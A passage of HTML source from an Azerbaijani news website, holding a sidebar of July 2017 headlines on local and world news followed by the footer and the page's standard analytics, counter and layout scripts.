              <a class="pull-left" href="http://www.xebersaati.com/news/89075-rusiyada-telefon-ve-ust-geyimlerin-teyyareye-kecirilmesi-pullu-ola-biler/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDcvMjUvMTMvMjIvMTEvNTQxL3RleXlhcmUuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=c683da6c"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89075-rusiyada-telefon-ve-ust-geyimlerin-teyyareye-kecirilmesi-pullu-ola-biler/">Rusiyada telefon və üst geyimlərin təyyarəyə keçirilməsi pullu ola bilər</a></div>
                <small>2017-07-25 13:27 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89049-ali-mektebelere-ii-ve-iii-qruplar-uzre-qebul-plani-ve-dovlet-sifarishli-yerlerin-sayi-melum-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/mtahan.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89049-ali-mektebelere-ii-ve-iii-qruplar-uzre-qebul-plani-ve-dovlet-sifarishli-yerlerin-sayi-melum-olub/">Ali məktəbələrə II və III qruplar üzrə qəbul planı və dövlət sifarişli yerlərin sayı məlum olub</a></div>
                <small>2017-07-25 13:22 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89043-olke-iqtisadiyyatina-5-mlrd-dollar-investisiya-yatirilib/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2015/02/11/dollars_110215_3.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89043-olke-iqtisadiyyatina-5-mlrd-dollar-investisiya-yatirilib/">Ölkə iqtisadiyyatına 5 mlrd. dollar investisiya yatırılıb</a></div>
                <small>2017-07-25 13:21 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89074-azerbaycanda-19-mektebli-qiz-abort-etdirib/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDcvMjUvMTMvMDEvMDEvMjQ3L2Fib3J0LmpwZyJdLFsicCIsImVuY29kZSIsImpwZyIsIi1xdWFsaXR5IDgwIl0sWyJwIiwidGh1bWIiLCI2MjB4NDY1XHUwMDNlIl1d?sha=24b0c3b0"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89074-azerbaycanda-19-mektebli-qiz-abort-etdirib/">Azərbaycanda 19 məktəbli qız abort etdirib</a></div>
                <small>2017-07-25 13:19 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89048-erdogan-el-aksa-mescidi-ile-bagli-dunya-muselmanlarina-cagirish-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/receb-tayyib-erdogan-recep-tayyib-erdogan.jpeg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89048-erdogan-el-aksa-mescidi-ile-bagli-dunya-muselmanlarina-cagirish-edib/">Ərdoğan Əl-Aksa məscidi ilə bağlı dünya müsəlmanlarına çağırış edib</a></div>
                <small>2017-07-25 13:15 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89035-qanunsuz-agac-kesen-shexsler-hebs-edilib-cinayet-ishi-bashlanib/"><img class="media-object img-rounded" widht="75" height="45" src="https://cdn2.trend.az/media/pictures/2009/01/13/Tree_130109.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89035-qanunsuz-agac-kesen-shexsler-hebs-edilib-cinayet-ishi-bashlanib/">Qanunsuz ağac kəsən şəxslər həbs edilib - cinayət işi başlanıb</a></div>
                <small>2017-07-25 13:14 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89038-masallida-din-xadiminin-evinden-ogurluq-edilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/ogurluq.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89038-masallida-din-xadiminin-evinden-ogurluq-edilib/">Masallıda din xadiminin evindən oğurluq edilib</a></div>
                <small>2017-07-25 13:05 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/89037-iqtisadiyyat-nazirliyinde-kollegiya-iclasi-kecirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/july/25/big/img-7555.JPG"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/89037-iqtisadiyyat-nazirliyinde-kollegiya-iclasi-kecirilib/">İqtisadiyyat Nazirliyində kollegiya iclası keçirilib</a></div>
                <small>2017-07-25 13:04 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li></ul></div>    </div><!-- row -->

    <footer>
    	<hr>
    	<p class="text-center"><small>Saytdakı materialların istifadəsi zamanı istinad edilməsi vacibdir. Məlumat internet səhifələrində istifadə edildikdə hiperlink vasitəsi ilə istinad mütləqdir.</small><br>Copyright © 2016 All rights reserved. </p>
    	<p class="text-center">
    	  <!--LiveInternet counter--><script type="text/javascript"><!--
          document.write("<img src='//counter.yadro.ru/hit?t29.3;r"+
          escape(document.referrer)+((typeof(screen)=="undefined")?"":
          ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
          ";h"+escape(document.title.substring(0,80))+";"+Math.random()+
          "' alt='' title='LiveInternet: number of visitors and pageviews"+
          " is shown' "+
          "border='0' width='88' height='120'>")
          //--></script><!--/LiveInternet-->
          <img border=0 alt='ILK-10 Azeri Website Directory' src='http://www.ilk10.az/counter/count3.php?color=liliac&id=36590'>
    	</p>
    </footer>
    </div><!-- container -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript">
    	$('.xeberMetni iframe').wrap('<div class="embed-responsive embed-responsive-16by9"></div>');
    	$(".embed-responsive").before('<div class="clearfix"></div>');$(".xeberMetni iframe").addClass('embed-responsive-item');
      var flag="false";
      $("#kategoriyalarButton").click(function(){
        if(flag=="false")
          {$('#kategoriyalar').show(200); flag="true"; $("#kategoriyalarButton button").html('Kategoriyaları gizlət <i class="fa fa-angle-double-up" aria-hidden="true"></i>');} 
        else 
          {$('#kategoriyalar').hide(200); flag="false"; $("#kategoriyalarButton button").html('Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i>');}
        
      });
    </script>
    <!--Google Analytics-->
	  <script>
	    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	    ga('create', 'UA-31581333-12', 'auto');
	    ga('send', 'pageview');

	  </script>
	  <!--Google Analytics-->
	  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5709013e408ef89c"></script>
	  <script type="text/javascript">jQuery.ajax({type: "GET",url: "http://topmedia.az/click.php"});</script>
  </body>
</html>
